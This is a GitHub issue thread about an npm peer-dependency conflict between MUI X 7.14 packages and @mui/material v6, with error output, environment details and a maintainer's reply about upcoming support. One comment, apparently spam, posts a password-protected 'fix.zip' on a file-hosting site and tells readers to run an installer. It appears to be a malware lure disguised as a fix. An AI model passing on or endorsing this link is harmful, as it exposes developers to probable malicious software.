### ISSUE TITLE
Dependency conflict with material v6

### ISSUE THREAD

**Issue by nandeshwarshubh** [mui/mui-x#14369]
### Steps to reproduce

Link to live example: (required)

Steps:
1. npm i @mui/icons-material@6.0.0 @mui/material@6.0.0 @mui/x-data-grid-pro@7.14.0 @mui/x-date-pickers-pro@7.14.0 @emotion/react@11.13.3 @emotion/styled@11.13.0

### Current behavior

npm error code ERESOLVE
npm error ERESOLVE unable to resolve dependency tree
npm error
npm error While resolving: @myorg/myapp@1.0.0
npm error Found: @mui/material@6.0.0
npm error node_modules/@mui/material
npm error   @mui/material@"6.0.0" from the root project
npm error
npm error Could not resolve dependency:
npm error peer @mui/material@"^5.15.14" from @mui/x-data-grid-pro@7.14.0
npm error node_modules/@mui/x-data-grid-pro
npm error   @mui/x-data-grid-pro@"7.14.0" from the root project

### Expected behavior

mui-x should work with latest  @mui/material version v6

### Context

Upgrading MUI to latest version

### Your environment

  System:
  	OS: macOS 14.6.1
  Binaries:
    Node: 20.12.1 - /usr/local/bin/node
    npm: 10.8.2 - /usr/local/bin/npm
    pnpm: 8.6.5 - /opt/homebrew/bin/pnpm
  Browsers:
    Chrome: 128.0.6613.85
    Edge: Not Found
    Safari: 17.6
  npmPackages:
    @emotion/react: ^11.13.3 => 11.13.3 
    @emotion/styled: ^11.13.0 => 11.13.0 
    @mui/core-downloads-tracker:  5.16.7 
    @mui/material: ^5.16.7 => 5.16.7 
    @mui/private-theming:  5.16.6 
    @mui/styled-engine:  5.16.6 
    @mui/system:  5.16.7 
    @mui/types:  7.2.15 
    @mui/utils:  5.16.6 
    @mui/x-data-grid:  7.14.0 
    @mui/x-data-grid-pro: ^7.14.0 => 7.14.0 
    @mui/x-date-pickers:  7.14.0 
    @mui/x-date-pickers-pro: ^7.14.0 => 7.14.0 
    @mui/x-internals:  7.14.0 
    @mui/x-license:  7.14.0 
    @types/react: 17.0.40 => 17.0.40 
    react: 17.0.2 => 17.0.2 
    react-dom: 17.0.2 => 17.0.2 
    typescript: 5.0.4 => 5.0.4 

**Search keywords**: Mui v6
**Order ID**: 93125

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LukasTy** [comment]
We are working on support here: https://github.com/mui/mui-x/pull/14142
It is in the final refinement stages.
The target is to support `@mui/material@6` with this weeks release. 😉
